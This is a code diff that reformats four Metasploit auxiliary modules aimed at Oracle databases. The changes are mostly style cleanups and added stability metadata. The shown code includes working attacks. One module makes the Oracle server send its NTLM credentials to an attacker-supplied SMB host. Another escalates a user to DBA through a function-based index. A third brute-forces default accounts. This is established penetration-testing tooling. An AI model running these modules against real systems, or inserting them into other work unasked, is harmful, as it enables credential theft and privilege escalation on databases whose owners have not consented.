kernelsmith
diff --git a/‎modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb‎
Lines changed: 41 additions & 33 deletions b/‎modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb‎
Lines changed: 41 additions & 33 deletions
diff --git a/‎modules/auxiliary/admin/oracle/oracle_index_privesc.rb‎
Lines changed: 23 additions & 15 deletions b/‎modules/auxiliary/admin/oracle/oracle_index_privesc.rb‎
Lines changed: 23 additions & 15 deletions
diff --git a/‎modules/auxiliary/admin/oracle/oracle_login.rb‎
Lines changed: 28 additions & 20 deletions b/‎modules/auxiliary/admin/oracle/oracle_login.rb‎
Lines changed: 28 additions & 20 deletions
diff --git a/‎modules/auxiliary/admin/oracle/oracle_sql.rb‎
Lines changed: 24 additions & 15 deletions b/‎modules/auxiliary/admin/oracle/oracle_sql.rb‎
Lines changed: 24 additions & 15 deletions
@@ -7,50 +7,59 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::ORACLE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Oracle SMB Relay Code Execution',
-      'Description'    => %q{
-        This module will help you to get Administrator access to OS using an unprivileged
-        Oracle database user (you need only CONNECT and RESOURCE privileges).
-        To do this you must firstly run smb_sniffer or smb_relay module on your sever.
-        Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb
-        which will connect to your SMB sever with credentials of Oracle RDBMS.
-        So if smb_relay is working, you will get Administrator access to server which
-        runs Oracle. If not than you can decrypt HALFLM hash.
-      },
-      'Author'         => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle SMB Relay Code Execution',
+        'Description' => %q{
+          This module will help you to get Administrator access to OS using an unprivileged
+          Oracle database user (you need only CONNECT and RESOURCE privileges).
+          To do this you must firstly run smb_sniffer or smb_relay module on your server.
+          Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb
+          which will connect to your SMB server with credentials of Oracle RDBMS.
+          So if smb_relay is working, you will get Administrator access to server which
+          runs Oracle. If not than you can decrypt HALFLM hash.
+        },
+        'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],
         ],
-      'DisclosureDate' => '2009-04-07'))
+        'DisclosureDate' => '2009-04-07',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
 
-      register_options(
-        [
-          OptString.new('IP', [ false, 'IP address of SMB proxy.', '0.0.0.0' ]),
-        ])
+    register_options(
+      [
+        OptString.new('IP', [ false, 'IP address of SMB proxy.', '0.0.0.0' ]),
+      ]
+    )
   end
 
   def run
-    return if not check_dependencies
+    return if !check_dependencies
 
-    name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
-    name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
-    rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
-    rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
-    rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+    name1 = Rex::Text.rand_text_alpha_upper(1..10)
+    name2 = Rex::Text.rand_text_alpha_upper(1..10)
+    rand1 = Rex::Text.rand_text_alpha_upper(1..10)
+    rand2 = Rex::Text.rand_text_alpha_upper(1..10)
+    rand3 = Rex::Text.rand_text_alpha_upper(1..10)
 
-    prepare  = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))"
+    prepare = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))"
     prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)"
 
     exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')"
 
-    prp  = Rex::Text.encode_base64(prepare)
+    prp = Rex::Text.encode_base64(prepare)
     prp1 = Rex::Text.encode_base64(prepare1)
     exp1 = Rex::Text.encode_base64(exploiting1)
 
-    sql = %Q|
+    sql = %|
       DECLARE
       #{rand1} VARCHAR2(32767);
       #{rand2} VARCHAR2(32767);
@@ -66,11 +75,10 @@ def run
       |
 
     begin
-      print_status("Executing #{self.name}...")
+      print_status("Executing #{name}...")
       prepare_exec(sql)
-    rescue => e
-      return
+    rescue StandardError => e
+      vprint_error(e.message)
     end
-
   end
 end
@@ -8,30 +8,38 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::ORACLE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Oracle DB Privilege Escalation via Function-Based Index',
-      'Description'    => %q{
-        This module will escalate an Oracle DB user to DBA by creating a
-        function-based index on a table owned by a more-privileged user.
-        Credits to David Litchfield for publishing the technique.
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle DB Privilege Escalation via Function-Based Index',
+        'Description' => %q{
+          This module will escalate an Oracle DB user to DBA by creating a
+          function-based index on a table owned by a more-privileged user.
+          Credits to David Litchfield for publishing the technique.
+        },
+        'Author' => [
           'David Litchfield', # Vulnerability discovery and exploit
-          'Moshe Kaplan',     # Metasploit module
+          'Moshe Kaplan', # Metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'URL', 'http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf' ],
         ],
-      'DisclosureDate' => '2015-01-21'))
+        'DisclosureDate' => '2015-01-21',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
         OptString.new('SQL', [ true, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}" ]),
         OptString.new('TABLE', [ true, 'Table to create the index on.', 'SYS.DUAL' ]),
-      ])
+      ]
+    )
   end
 
   def run
 
@@ -10,28 +10,36 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::ORACLE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Oracle Account Discovery',
-      'Description'    => %q{
-        This module uses a list of well known default authentication credentials
-        to discover easily guessed accounts.
-      },
-      'Author'         => [ 'MC' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle Account Discovery',
+        'Description' => %q{
+          This module uses a list of well known default authentication credentials
+          to discover easily guessed accounts.
+        },
+        'Author' => [ 'MC' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv' ],
           [ 'URL', 'https://seclists.org/fulldisclosure/2009/Oct/261' ],
         ],
-      'DisclosureDate' => '2008-11-20'))
+        'DisclosureDate' => '2008-11-20',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS],
+          'Reliability' => []
+        }
+      )
+    )
 
-      register_options(
-        [
-          OptPath.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]),
-        ])
-
-      deregister_options('DBUSER','DBPASS')
+    register_options(
+      [
+        OptPath.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]),
+      ]
+    )
 
+    deregister_options('DBUSER', 'DBPASS')
   end
 
   def report_cred(opts)
@@ -61,13 +69,13 @@ def report_cred(opts)
   end
 
   def run
-    return if not check_dependencies
+    return if !check_dependencies
 
     list = datastore['CSVFILE']
 
     print_status("Starting brute force on #{datastore['RHOST']}:#{datastore['RPORT']}...")
 
-    fd = CSV.foreach(list) do |brute|
+    CSV.foreach(list) do |brute|
       datastore['DBUSER'] = brute[2].downcase
       datastore['DBPASS'] = brute[3].downcase
 
@@ -79,7 +87,7 @@ def run
           print_error("#{datastore['RHOST']}:#{datastore['RPORT']} Connection timed out")
           break
         else
-          vprint_error("#{datastore['RHOST']}:#{datastore['RPORT']} - LOGIN FAILED: #{datastore['DBUSER']}: #{e.to_s})")
+          vprint_error("#{datastore['RHOST']}:#{datastore['RPORT']} - LOGIN FAILED: #{datastore['DBUSER']}: #{e})")
         end
       else
         report_cred(
 
@@ -7,29 +7,38 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::ORACLE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Oracle SQL Generic Query',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle SQL Generic Query',
+        'Description' => %q{
           This module allows for simple SQL statements to be executed
           against an Oracle instance given the appropriate credentials
           and sid.
-      },
-      'Author'         => [ 'MC' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        },
+        'Author' => [ 'MC' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'URL', 'http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/' ],
         ],
-      'DisclosureDate' => '2007-12-07'))
+        'DisclosureDate' => '2007-12-07',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
 
-      register_options(
-        [
-          OptString.new('SQL', [ false, 'The SQL to execute.',  'select * from v$version']),
-        ])
+    register_options(
+      [
+        OptString.new('SQL', [false, 'The SQL to execute.', 'select * from v$version']),
+      ]
+    )
   end
 
   def run
-    return if not check_dependencies
+    return if !check_dependencies
 
     query = datastore['SQL']
 
@@ -42,7 +51,7 @@ def run
           print_status(line)
         end
       end
-    rescue => e
+    rescue StandardError
       return
     end
   end